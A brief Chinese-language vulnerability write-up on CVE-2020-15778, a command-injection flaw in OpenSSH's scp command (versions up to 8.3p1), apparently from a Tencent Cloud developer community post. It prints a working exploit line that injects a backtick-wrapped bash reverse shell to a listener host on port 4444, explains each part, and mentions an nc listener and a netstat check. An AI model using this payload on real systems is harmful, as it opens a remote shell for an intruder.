漏洞名称 | Openssh命令执行 |
|---|---|
CVE编号 | CVE-2020-15778 |
公开时间 | 2020-7-18 |
影响版本 | version <= openssh-8.3p1 |
SCP是linux系统下基于ssh登录进行安全远程文件、目录拷贝的命令,可以在linux之间复制文件和目录。Openssh中小于8.3p1版本SCP命令里存在命令注入漏洞。当将文件复制到远程主机时,文件路径附加到本地SCP命令末尾,可以触发命令注入漏洞。攻击者采用反引号(`)文件作为命令注入。
scp haha.txt haha@192.168.2.100:'`/bin/bash -i >& /dev/tcp/192.168.2.132/4444 0>&1` /tmp/haha.txt'
/bin/bash -i: 产生一个交互环境
>&: 将标准输出和标准错误结合
/dev/tcp/ip/port: 建立一个tcp连接
0>&1: 将标准输入重定向到标准输出nc -lnvp 4
查看端口服务,发现多了4444这个端口,并且流量向外发
netstat -ntlpa | grep 4444
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。